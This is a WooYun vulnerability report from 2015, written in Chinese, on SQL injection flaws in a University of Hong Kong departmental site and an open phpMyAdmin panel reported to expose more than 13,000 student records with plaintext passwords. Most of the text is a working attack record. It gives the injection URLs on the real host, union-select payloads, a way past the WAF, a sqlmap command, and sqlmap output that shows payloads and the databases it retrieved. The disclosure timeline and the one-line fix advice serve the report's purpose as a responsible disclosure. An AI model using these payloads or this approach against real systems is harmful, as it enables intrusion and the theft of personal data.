乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-09: 细节已通知厂商并且等待厂商处理中 2015-10-12: 厂商已经确认,细节仅向厂商公开 2015-10-22: 细节向核心白帽子及相关领域专家公开 2015-10-29: 厂商已经修复漏洞并主动公开,细节向公众公开
http://t.qq.com/p/t/470498077400717香港大学某分站存在多处SQL注入漏洞附送一个未授权访问漏洞,可导致13000多名学生敏感信息泄露(明文密码),并可间接利用数据库获取多台服务器系统权限。
#1 注入点
http://www.mech.hku.hk/index.php?tpl=page&id=3http://www.mech.hku.hk/index.php?tpl=news&cid=1http://www.mech.hku.hk/index.php?tpl=people&cid=1
#2 注入的时候,有WAF,无法用工具跑
http://www.mech.hku.hk/index.php?tpl=news&cid=1 order by 4%23 # 字段为4http://www.mech.hku.hk/index.php?tpl=news&cid=1 and 1=2 union select 1,2,3,4%23 # 直接服务器被断开
绕过方法就是换https的域名,httpd的配置文件配置不当
python sqlmap.py -u "**.**.**.**/index.php?tpl=page&id=3" --dbs
#3 注入成功
[*] starting at 21:19:41[21:19:41] [INFO] resuming back-end DBMS 'mysql' [21:19:41] [INFO] testing connection to the target URL[21:19:41] [INFO] heuristically checking if the target is protected by some kind of WAF/IPS/IDS[21:19:42] [INFO] it appears that the target is not protectedsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: tpl=page&id=3 AND 1674=1674 Type: UNION query Title: MySQL UNION query (NULL) - 2 columns Payload: tpl=page&id=-1583 UNION ALL SELECT NULL,CONCAT(0x71707a7671,0x487566664b4178587a6a,0x7170717671)# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: tpl=page&id=3 AND SLEEP(5)---[21:19:42] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.3.3, Apacheback-end DBMS: MySQL 5.0.11[21:19:42] [INFO] fetching database names[21:19:42] [WARNING] reflective value(s) found and filtering out[21:19:42] [INFO] the SQL query used returns 2 entries[21:19:42] [INFO] retrieved: information_schema[21:19:43] [INFO] retrieved: mechavailable databases [2]: [*] information_schema[*] mech
#END 附送一个未授权访问漏洞,可导致13000多名学生敏感信息泄露,并可间接利用数据库获取多台服务器系统权限。
http://ns1.caes.hku.hk/phpmyadmin phpmyadmin可不需要密码直接访问
student数据库中的User表中,存储了13000多名学生的信息
Host name: caesOperating system: Linux 2.6.32-74-serverApache: Apache/2.2.14 (Ubuntu)PHP: 5.3.2-1ubuntu4.30MySQL: 5.1.73-0ubuntu**.**.**.**
#1 WAF规则检测完善#2 对存在SQL注入的参数进行安全转义
危害等级:中
漏洞Rank:10
确认时间:2015-10-12 18:14
已將事件通知有關機構
2015-10-29:相關機構回報已修復漏洞